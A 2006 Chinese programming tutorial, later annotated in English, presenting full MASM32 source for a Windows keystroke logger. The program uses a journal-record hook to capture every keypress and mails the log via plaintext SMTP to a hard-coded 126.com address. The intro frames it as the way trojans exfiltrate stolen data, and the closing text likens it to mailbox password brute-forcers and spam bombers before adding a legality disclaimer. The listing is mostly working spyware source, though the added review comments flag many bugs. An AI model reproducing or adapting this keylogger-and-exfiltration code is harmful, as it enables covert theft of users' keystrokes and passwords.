编程手动将钩子内容发送到126邮箱(原文写作"油箱")

编程手动将钩子内容发送到126邮箱


作者:PSH 
日期:2006/12/..


在木马盗取信息时,往往要把信息发送到邮箱中去,这就要了解 SMTP 协议。写一个只向 126 邮箱发信的程序还是很简单的,难就难在写一个能向任何邮箱发信的通用程序。所以 Outlook、Foxmail(作者下文称之为"火狐";从抓包得到的 X-mailer: Foxmail 5.0 头可以看出指的是 Foxmail 邮件客户端,而不是 Firefox 浏览器)这类邮件收发程序都是很复杂的东西,特别是微软的 Outlook。我现在就教给大家一个向 126 邮箱发信的方法。一般人当然会想到去图书馆找讲 SMTP 协议的书,但没有一定基础是看不懂的;就算看得懂,书里讲的也是面向任意邮箱的庞大系统,很吓人。而且你找遍所有资料(包括互联网)也找不到发送时的具体报文格式,唯一的办法是抓包。说到这里,要感谢网友"猪头三",是他教我的这个好方法。


1. 找一个 Foxmail(即文中的"火狐")邮件客户端,把 126 账户设置好。不要去抓 Outlook 的包,那要难得多。
2. 找一个抓包工具,我用的是 MiniSniffer,需要的可以到我的共享资源里下载。
3. 用 Foxmail 向 126 邮箱发送一封邮件,让 MiniSniffer 抓到它的包。记住不要带附件,搞懂了再研究发附件的程序。同时要把端口设置为 25(明文 SMTP)。注意:抓到的包里就有你自己的账号和密码——它们只是 base64 编码,任何能抓包的人都能直接还原,这也说明这种发信方式本身并不安全。
4. 现在就可以根据抓到的包,一步一步地写你的发送内容了。这样发送格式一目了然,以不变应万变。
5. 了解一下 SMTP 协议,可以更好地写出代码。前提是你要了解网络的基本通信过程和 Winsock 编程。
6. 126 邮箱抓到的包里有些信息是乱码,那是 base64 编码的内容(注意:base64 只是编码,不是加密,不提供任何保密性),可以先看懂我的 base64 编解码笔记。分析乱码可以用我的工具来进行解码和编码,需要的到我的共享资源里找。


;================================================================================================================
以下是资源脚本 ps.rc 的代码:
;================================================================================================================
// ps.rc -- resource script for the "126 mail sending tutorial" dialog.
// Recovered from a web page that collapsed the file onto one line; only
// line breaks and these comments were added, every token is as captured.
// NOTE(review): the argument of the #include below was lost in the capture
// (its angle brackets were eaten by the HTML). The MASM32 dialog samples
// this follows normally include <resource.h>; confirm against the original
// before building, as written the line does not compile.
#include
#define ICO_MAIN    0x1000
#define DLG_MAIN    1
#define IDC_TEXT    1001

// Application icon; _ProcDlgMain loads it on WM_INITDIALOG.
ICO_MAIN ICON "Main.ico"

// Main window: a read-only multi-line edit box (IDC_TEXT) into which the
// keyboard hook echoes every captured key, and one default "send" button
// (IDOK) that triggers the SMTP upload.
DLG_MAIN DIALOG 208, 130, 200, 100
STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENU
CAPTION "126邮件发送教程"
FONT 9, "宋体"
{
    ICON          ICO_MAIN, -1, 8, 2, 18, 16
    LTEXT         "本程序为带钩子的程序", -1, 33, 9, 100, 16
    EDITTEXT      IDC_TEXT, 5, 20, 190, 57, ES_MULTILINE | ES_AUTOVSCROLL
                  | WS_BORDER | WS_TABSTOP | ES_READONLY
    DEFPUSHBUTTON "发送(&X)", IDOK, 70, 82, 50, 14
}


;===============================================================================================================

; ---------------------------------------------------------------------------
; Keystroke logger with SMTP exfiltration (MASM32, Win32, stdcall, Intel syntax).
;
; What the visible code does:
;   * _ProcDlgMain installs a WH_JOURNALRECORD hook on WM_INITDIALOG. HookProc
;     translates every WM_KEYDOWN with ToAscii, echoes it into the read-only
;     edit control and appends it to a 100 KB heap buffer (pContent).
;   * The "send" button (IDOK) base64-encodes that buffer, folds it at 76
;     columns, formats it into a fixed mail body (szbody) and calls wsendto.
;   * wsendto speaks plain SMTP (EHLO / AUTH LOGIN / MAIL FROM / RCPT TO /
;     DATA / QUIT) to smtp.126.com on TCP port 25 with the account name and
;     password hard-coded in szname / szword.
;
; Security notes for anyone reading this listing:
;   * AUTH LOGIN sends the credentials base64-ENCODED, not encrypted. On port 25
;     without STARTTLS the password and the captured keystrokes are readable by
;     anyone on the path. The original Chinese comments call base64 "encryption";
;     it is only an encoding.
;   * Detection hints grounded in this code: SetWindowsHookEx(WH_JOURNALRECORD),
;     an outbound TCP/25 connection to smtp.126.com, and the fixed header lines
;     "X-mailer: Foxmail 5.0 [cn]" / "Subject:  HEIDANG" in the mail body.
;
; The listing was recovered from a web page that collapsed it onto a few lines;
; only line breaks, whitespace and comments were changed here. Code tokens are
; as captured, including the defects flagged as NOTE(review) below.
; ---------------------------------------------------------------------------
        .386
        .model flat, stdcall
        option casemap :none

include         windows.inc
include         user32.inc
includelib      user32.lib
include         kernel32.inc
includelib      kernel32.lib
includelib      wsock32.lib
include         wsock32.inc
include         masm32.inc              ; provides atodw, used to parse the SMTP reply code
includelib      masm32.lib

; Resource identifiers; must match ps.rc.
ICO_MAIN        equ     1000h
DLG_MAIN        equ     1
IDC_TEXT        equ     1001

; ---------------------------------------------------------------------------
; Uninitialised data.
; ---------------------------------------------------------------------------
                .data?
hInstance       dd      ?
hWinMain        dd      ?               ; dialog handle, set on WM_INITDIALOG
hHook           dd      ?               ; NOTE(review): never written -- see _ProcDlgMain
szAscii         db      32 dup (?)      ; ToAscii output for one key, NUL-terminated by HookProc
pContent        dd      ?               ; LocalAlloc(LPTR, 102400): captured keystrokes, later the mail body
shu             dd      ?               ; unused
szsize          db      4096 dup(?)     ; unused
hSocket         dd      ?
pFilesour       dd      ?               ; 76-column folded base64 text
pFiledion       dd      ?               ; raw base64 text
pFilemiin       dd      ?               ; unused
szkook          db      ?               ; only used as the address of a zero-length send
szBuffer1       db      102400 dup(?)   ; unused

; ---------------------------------------------------------------------------
; Initialised data.
; ---------------------------------------------------------------------------
                .data
buff            db      78 dup(?)       ; unused
szBuffer        db      MAX_PATH  dup(?)        ; recv buffer and scratch for formatted commands
szBuf1          db      MAX_PATH   dup(?)       ; base64 of user name / password
szBuf2          db      MAX_PATH  dup(?)        ; zeroed but otherwise unused
szHelo          db      MAX_PATH  dup(?)
szUsername      db      MAX_PATH  dup(?)        ; unused
szPassword      db      MAX_PATH  dup(?)        ; unused
wsadata         WSADATA        <>
szErrNoDll      db    "装载winsock.dll时出错!", 0
szCaption       db    "write by psh ,06-09---", 0
szErrSocket     db    "建立socket时出错!", 0
sin             sockaddr_in    <>
format          db    "%s",0                    ; unused
; Credentials are hard-coded and sent base64-encoded over plaintext SMTP.
szname          db    "你的帐户(如 aaalaohu 不要126@.com) ",0
szword          db    "**你的密码**",0
szSmtpServer    db    "smtp.126.com",0
szfrom          db    "aaalaohu@126.com",0
szto            db    "aaasjm@126.com",0
szErrConnect    db    "进行连接时出错!", 0
szsting         db    "ecc10d6d751d456",0       ; EHLO argument copied from the sniffed session; change if yours differs
szHeloFmt       db    "EHLO %s", 13, 10, 0
szAuth          db    "AUTH LOGIN", 13, 10, 0
szUsernameFmt   db    "%s", 13, 10, 0
szPasswordFmt   db    "%s", 13, 10, 0
szHeaderFmt     db    "MAIL FROM:<%s>", 13, 10 ,0
szhedaerto      db    "RCPT TO:<%s>", 13, 10, 0
szdata          db    "DATA" ,13,10,0
reply_val       dd    0                         ; numeric SMTP reply code after the password line
szErrAuth       db    "用户名/密码 验证失败!", 0
szQuit          db    "QUIT", 13, 10, 0
szSuccessSend   db    "发送成功!", 0
base            db    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

; ---------------------------------------------------------------------------
; Mail body template, copied from a sniffed Foxmail session. wsprintf fills
; "%s" with the folded base64 text; the trailing CRLF "." CRLF ends DATA.
; From:/To: are intentionally left empty; the Date is a fixed constant.
; ---------------------------------------------------------------------------
szbody          db "Date: Wed, 8 Feb 2006 11:39:00 +0800",13,10       ; could be generated at run time
                db "From:",13,10                                      ; sender (empty)
                db "To: ",13,10                                       ; recipient (empty)
                db "Subject:  HEIDANG",13,10                          ; subject
                db "X-mailer: Foxmail 5.0 [cn]",13,10                 ; client identification string
                db "Mime-Version: 1.0",13,10
                db "Content-Type: text/plain;",13,10
                db " charset=","""gb2312""",13,10
                db "Content-Transfer-Encoding: base64",13,10,13,10    ; blank line = end of headers
                db "%s",13,10
                db 13,10,".",13,10,0
szout           db "%s",0                       ; unused
szmat           db "%.76s",13,10,0              ; unused

                .code

; ---------------------------------------------------------------------------
; wstrip(ls, lp): copy the NUL-terminated base64 text at ls to lp, inserting
; CRLF after every 76 characters (the line length seen in the sniffed mail).
; In:   ls = source, lp = destination
; Out:  nothing; destination is not explicitly NUL-terminated (relies on the
;       caller's LPTR buffer being zero-filled).
; Clobbers: eax, ecx (ebx/esi/edi are saved by "uses").
; NOTE(review): the remainder loop at @1 copies ecx DWORDs, i.e. 4*ecx bytes,
;       instead of ecx bytes, and when the remainder is 0 (length an exact
;       multiple of 76, including an empty string) `loop` runs with ecx=0 and
;       wraps, writing ~4 GB past the buffer. In practice the over-copy reads
;       zero bytes from the caller's zeroed buffer, which is why it appears to work.
; ---------------------------------------------------------------------------
wstrip          proc    uses ebx edi esi ls,lp
                mov     esi,ls
                mov     edi,lp
                invoke  lstrlen ,ls
                mov     ecx,eax                 ; ecx = bytes remaining
@2:
                cmp     ecx,76
                jl      @1                      ; fewer than 76 left -> tail copy
                mov     ebx,76
@@:             lodsd                           ; copy 76 bytes as 19 DWORDs
                stosd
                sub     ebx ,4
                jnz     @B
                mov     ax ,0a0dh               ; CR LF (little-endian word)
                stosw
                sub     ecx,76
                jmp     @2
@1:             lodsd                           ; NOTE(review): copies ecx DWORDs, not bytes
                stosd
                loop    @1
                mov     ax,0a0dh
                stosw
                ret
wstrip          endp

; ---------------------------------------------------------------------------
; Base64Encode(source, destination): base64-encode the NUL-terminated string
; at source into destination using the alphabet in `base`.
; In:   source, destination (pointers)
; Out:  nothing; output is not NUL-terminated.
; Clobbers: eax, ecx (ebx/esi/edi saved by "uses").
; Each iteration takes 3 input bytes b0 b1 b2 (loaded little-endian into eax as
; b2:b1:b0) and emits 4 alphabet characters.
; NOTE(review): not RFC 4648 -- a 1- or 2-byte tail is zero-padded IN THE SOURCE
;       BUFFER and encoded as 'A' characters instead of emitting '='. The 1-byte
;       case writes a word at [esi+1], one byte PAST the source's NUL terminator
;       (overwrites whatever follows the string). An empty source (ecx = 0) is
;       not handled: `sub ecx,3` wraps and the loop runs until it faults.
; ---------------------------------------------------------------------------
Base64Encode    proc    uses ebx edi esi source:DWORD, destination:DWORD
                mov     esi,source
                mov     edi,destination
                invoke  lstrlen ,source
                mov     ecx,eax                 ; ecx = input bytes remaining
                xor     ebx,ebx                 ; bl is the 6-bit table index; upper bytes stay 0
@1:
                .if     ecx == 2                ; pad the tail with zero bytes in place
                        mov     byte ptr [esi+2],00h
                        inc     ecx
                .elseif ecx == 1
                        mov     word ptr [esi +1],0000h     ; NOTE(review): 1 byte past the terminator
                        add     ecx,2
                .endif
                lodsw                           ; ax = b1:b0
                push    ax
                xor     eax,eax
                lodsb                           ; al = b2
                shl     eax,16
                pop     ax                      ; eax = b2<<16 | b1<<8 | b0
                push    ax
                and     al,0fch                 ; sextet 1 = b0 >> 2
                shr     al,2
                mov     bl ,al
                mov     al,byte ptr [offset base + ebx]
                stosb
                pop     ax
                push    ax
                and     ax ,0f003h              ; sextet 2 = (b0 & 3) << 4 | b1 >> 4
                rol     ax,4
                mov     bl ,al
                mov     al,byte ptr [offset base + ebx]
                stosb
                pop     ax
                shr     eax ,8                  ; eax = b2<<8 | b1
                push    ax
                and     ax ,0c00fh              ; sextet 3 = (b1 & 0fh) << 2 | b2 >> 6
                rol     ax,2
                mov     bl ,al
                mov     al,byte ptr [offset base + ebx]
                stosb
                pop     ax
                shr     ax ,8                   ; sextet 4 = b2 & 3fh
                and     al ,3fh
                mov     bl ,al
                mov     al,byte ptr [offset base + ebx]
                stosb
                sub     ecx ,3
                jnz     @1
                ret
Base64Encode    endp

; ---------------------------------------------------------------------------
; wsendto(): deliver pContent as the body of one mail through smtp.126.com:25.
; Sequence (each command is followed by a single recv whose content is
; discarded, except the reply to the password line):
;   connect -> EHLO -> AUTH LOGIN -> base64(user) -> base64(pass) [expects 235]
;   -> MAIL FROM -> RCPT TO -> DATA -> body -> QUIT
; Every failure path shows a MessageBox; there is no return value.
; NOTE(review), in order of appearance:
;   * gethostbyname's result is dereferenced without a NULL check
;     (DNS failure = crash). [eax+12] is hostent.h_addr_list.
;   * `.if eax < 0` after connect: MASM compares a bare register as unsigned,
;     so this branch can never be taken; connect's SOCKET_ERROR (-1) falls
;     through and the dialogue continues on an unconnected socket.
;     `.if eax == SOCKET_ERROR` is the intended test.
;   * No send/recv return value is checked, and each recv is read once into a
;     MAX_PATH buffer; a multi-line EHLO reply arriving in several segments
;     would desynchronise every later reply.
;   * `send ... addr szkook, 0, 0` sends zero bytes (no effect).
;   * closesocket runs even when socket() failed (hSocket uninitialised).
;   * Credentials go out base64-encoded over plaintext TCP/25 (see file header).
; ---------------------------------------------------------------------------
wsendto         proc    uses ebx edi esi
                invoke  WSAStartup, 101h, addr wsadata
                .if     eax != NULL
                        invoke  MessageBox, NULL, addr szErrNoDll, addr szCaption, MB_OK or MB_ICONHAND
                .else
                        invoke  socket, AF_INET, SOCK_STREAM, 0
                        .if     eax == INVALID_SOCKET
                                invoke  MessageBox,NULL, addr szErrSocket, addr szCaption, MB_OK or MB_ICONHAND
                        .else
                                mov     hSocket, eax
                                mov     sin.sin_family, AF_INET
                                invoke  htons, 25                       ; plain SMTP, no TLS
                                mov     sin.sin_port, ax
                                invoke  gethostbyname, addr szSmtpServer
                                mov     eax, [eax + 12]                 ; NOTE(review): NULL not checked
                                mov     eax, [eax]                      ; h_addr_list[0]
                                mov     eax, [eax]                      ; first IPv4 address
                                mov     sin.sin_addr, eax
                                invoke  connect, hSocket, addr sin, sizeof sin
                                .if     eax < 0                         ; NOTE(review): never true (unsigned compare)
                                        invoke  MessageBox,NULL, addr szErrConnect, addr szCaption, MB_OK or MB_ICONHAND
                                .else
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        invoke  RtlZeroMemory, addr szBuf1, MAX_PATH
                                        invoke  RtlZeroMemory, addr szBuf2, MAX_PATH
                                        ; zero-length send, then read the server greeting
                                        invoke  send, hSocket, addr szkook, 0, 0
                                        invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        ; EHLO <client name>
                                        invoke  wsprintf, addr szHelo, addr szHeloFmt, addr szsting
                                        invoke  lstrlen, addr szHelo
                                        invoke  send, hSocket, addr szHelo, eax, 0
                                        invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        invoke  RtlZeroMemory, addr  szBuf1,MAX_PATH
                                        ; AUTH LOGIN
                                        invoke  lstrlen, addr szAuth
                                        invoke  send, hSocket, addr szAuth, eax, 0
                                        invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        ; base64(user name) CRLF
                                        invoke  Base64Encode, addr szname, addr szBuf1
                                        invoke  wsprintf, addr szBuffer, addr szUsernameFmt, addr szBuf1
                                        invoke  lstrlen, addr szBuffer
                                        invoke  send, hSocket, addr szBuffer, eax, 0
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        invoke  RtlZeroMemory, addr szBuf1, MAX_PATH
                                        ; base64(password) CRLF -- encoded, not encrypted
                                        invoke  Base64Encode, addr szword, addr szBuf1
                                        invoke  wsprintf, addr szBuffer, addr szPasswordFmt, addr szBuf1
                                        invoke  lstrlen, addr szBuffer
                                        invoke  send, hSocket, addr szBuffer, eax, 0
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                        invoke  RtlZeroMemory, addr szBuf1, MAX_PATH
                                        ; keep only the 3-digit reply code and parse it
                                        mov     byte ptr [szBuffer + 3], 0
                                        invoke  atodw, addr szBuffer
                                        mov     reply_val, eax
                                        invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                        .if     reply_val != 235                ; 235 = authentication succeeded
                                                invoke  MessageBox,NULL, addr szErrAuth, addr szCaption, MB_OK or MB_ICONHAND
                                        .else
                                                ; MAIL FROM:<szfrom>
                                                invoke  wsprintf, addr szBuffer, addr szHeaderFmt, addr szfrom
                                                invoke  lstrlen, addr szBuffer
                                                invoke  send, hSocket, addr szBuffer, eax, 0
                                                invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                                invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                                invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                                ; RCPT TO:<szto>
                                                invoke  wsprintf, addr szBuffer, addr szhedaerto , addr szto
                                                invoke  lstrlen, addr szBuffer
                                                invoke  send, hSocket, addr szBuffer, eax, 0
                                                invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                                invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                                invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                                ; DATA
                                                invoke  lstrlen, addr szdata
                                                invoke  send, hSocket, addr szdata, eax, 0
                                                invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                                invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                                ; message body (already ends with CRLF "." CRLF)
                                                invoke  lstrlen, pContent
                                                invoke  send, hSocket,pContent, eax, 0
                                                invoke  recv, hSocket, addr szBuffer, MAX_PATH, 0
                                                invoke  RtlZeroMemory, addr szBuffer, MAX_PATH
                                                ; QUIT (reply not read)
                                                invoke  lstrlen ,addr szQuit
                                                invoke  send, hSocket, addr szQuit, eax, 0
                                                invoke  MessageBox,NULL, addr szSuccessSend, addr szCaption, \
                                                        MB_OK or MB_ICONINFORMATION
                                        .endif
                                .endif
                        .endif
                        invoke  closesocket, hSocket    ; NOTE(review): also reached when socket() failed
                .endif
                invoke  WSACleanup
                ret
wsendto         endp

; ---------------------------------------------------------------------------
; HookProc(code, wParam, lParam): WH_JOURNALRECORD callback.
; For every HC_ACTION whose EVENTMSG.message is WM_KEYDOWN it translates the
; key with ToAscii (using the current keyboard state, with the SHIFT byte
; refreshed from GetKeyState), NUL-terminates the result in szAscii, turns a
; lone CR into CR LF, echoes it into the IDC_TEXT edit control and appends it
; to pContent with lstrcat. The hook chain is always called first.
; Register use: ebx -> EVENTMSG (restored by pushad/popad), eax = ToAscii count.
; NOTE(review):
;   * hHook passed to CallNextHookEx is never set by _ProcDlgMain (stays 0).
;   * lstrcat is unbounded; pContent is 102400 bytes, so ~100 K of keystrokes
;     overflow the heap block.
;   * The scan code is taken from the high word of EVENTMSG.paramH -- assumed
;     to be where the journal record puts it; verify against the SDK.
;   * The hook is only unhooked on IDOK, never on WM_CLOSE.
; ---------------------------------------------------------------------------
HookProc        proc    _dwCode,_wParam,_lParam
                local   @szKeyState[256]:byte
                invoke  CallNextHookEx,hHook,_dwCode,_wParam,_lParam
                pushad
                .if     _dwCode == HC_ACTION
                        mov     ebx,_lParam
                        assume  ebx:ptr EVENTMSG
                        .if     [ebx].message == WM_KEYDOWN
                                invoke  GetKeyboardState,addr @szKeyState
                                invoke  GetKeyState,VK_SHIFT
                                mov     @szKeyState + VK_SHIFT,al       ; refresh SHIFT state for ToAscii
                                mov     ecx,[ebx].paramH
                                shr     ecx,16                          ; scan code (see NOTE above)
                                invoke  ToAscii,[ebx].paramL,ecx,addr @szKeyState,addr szAscii,0
                                mov     byte ptr szAscii [eax],0        ; terminate after eax chars
                                .if     szAscii == 0dh                  ; CR -> CR LF
                                        mov     word ptr szAscii+1,0ah
                                .endif
                                invoke  SendDlgItemMessage,hWinMain,IDC_TEXT,EM_REPLACESEL,0,addr szAscii
                                invoke  lstrcat, pContent, addr szAscii ; NOTE(review): unbounded append
                        .endif
                        assume  ebx:nothing
                .endif
                popad
                ret
HookProc        endp

; ---------------------------------------------------------------------------
; _ProcDlgMain(hWnd, wMsg, wParam, lParam): modeless dialog procedure.
;   WM_INITDIALOG : set icon, remember hWnd, allocate pContent, install the
;                   journal-record hook.
;   WM_COMMAND/IDOK: unhook, base64-encode pContent, fold at 76 columns,
;                   format into szbody (reusing pContent as the output
;                   buffer), send via wsendto, free pContent.
;   WM_CLOSE      : destroy the window and post WM_QUIT.
; Returns TRUE for handled messages, FALSE otherwise.
; NOTE(review):
;   * The SetWindowsHookEx return value is discarded, so hHook stays 0;
;     UnhookWindowsHookEx(0) fails and the hook remains installed after IDOK,
;     while pContent is freed below -- HookProc's next lstrcat writes into
;     freed memory. `mov hHook,eax` after SetWindowsHookEx is the missing line.
;   * `sizeof pContent` is 4 (the size of the pointer), so only the first
;     4 bytes of the buffer are cleared; it works only because wsprintf
;     overwrites the buffer from the start.
;   * wsprintf output is capped at 1024 characters, so anything beyond the
;     first ~900 base64 characters of the body is silently dropped.
;   * Base64Encode on an empty pContent (no key pressed) does not terminate
;     (see that routine).
;   * Journal hooks are heavily restricted on Windows Vista and later; this
;     2006-era code is not expected to work unchanged there -- confirm.
; ---------------------------------------------------------------------------
_ProcDlgMain    proc    uses ebx edi esi hWnd,wMsg,wParam,lParam
                local   @dwTemp                 ; unused
                mov     eax,wMsg
                .if     eax == WM_CLOSE
                        invoke  DestroyWindow, hWnd
                        invoke  PostQuitMessage,NULL
                .elseif eax == WM_INITDIALOG
                        invoke  LoadIcon,hInstance,ICO_MAIN
                        invoke  SendMessage,hWnd,WM_SETICON,ICON_BIG,eax
                        push    hWnd
                        pop     hWinMain
                        invoke  LocalAlloc, LPTR, 102400        ; zero-filled keystroke buffer
                        mov     pContent, eax
                        invoke  SetWindowsHookEx,WH_JOURNALRECORD,addr HookProc,hInstance,NULL
                        ; NOTE(review): result (the hook handle) is not stored in hHook
                .elseif eax == WM_COMMAND
                        mov     eax,wParam
                        .if     ax == IDOK
                                invoke  UnhookWindowsHookEx,hHook       ; hHook is 0 here (see NOTE)
                                invoke  LocalAlloc, LPTR, 102400
                                mov     pFilesour, eax
                                invoke  LocalAlloc, LPTR, 102400
                                mov     pFiledion, eax
                                invoke  Base64Encode , pContent, pFiledion
                                invoke  RtlZeroMemory, pContent, sizeof pContent  ; clears 4 bytes only
                                invoke  wstrip ,pFiledion,pFilesour
                                invoke  wsprintf, pContent, addr szbody, pFilesour ; max 1024 chars
                                invoke  LocalFree, pFiledion
                                invoke  LocalFree, pFilesour
                                invoke  wsendto
                                invoke  LocalFree, pContent
                        .endif
                .else
                        mov     eax,FALSE
                        ret
                .endif
                mov     eax,TRUE
                ret
_ProcDlgMain    endp

; ---------------------------------------------------------------------------
; _WinMain(): create the modeless main dialog and run the message loop until
; GetMessage returns 0 (WM_QUIT). The loop is what lets the journal hook run.
; ---------------------------------------------------------------------------
_WinMain        proc
                local   @stMsg:MSG
                invoke  GetModuleHandle,NULL
                mov     hInstance,eax
                invoke  CreateDialogParam,hInstance,DLG_MAIN,NULL,offset _ProcDlgMain, NULL
                .while  TRUE
                        invoke  GetMessage,addr @stMsg,NULL,0,0
                        .break  .if eax == 0
                        invoke  TranslateMessage,addr @stMsg
                        invoke  DispatchMessage,addr @stMsg
                .endw
                ret
_WinMain        endp

;==================================================================================================================
; Program entry point.
start:
                call    _WinMain
                invoke  ExitProcess,NULL
end start
; ----------------------------------------------------



平时我们看到的那些暴力破解邮箱密码的工具,原理就和上面这个小程序一样;懂了的话,写个"垃圾邮件轰炸机"也不是难事。但必须提醒:未经授权记录他人键盘输入、尝试他人邮箱密码或者发送垃圾邮件都是违法行为,本文代码只应用于理解 SMTP 协议和做防护分析。
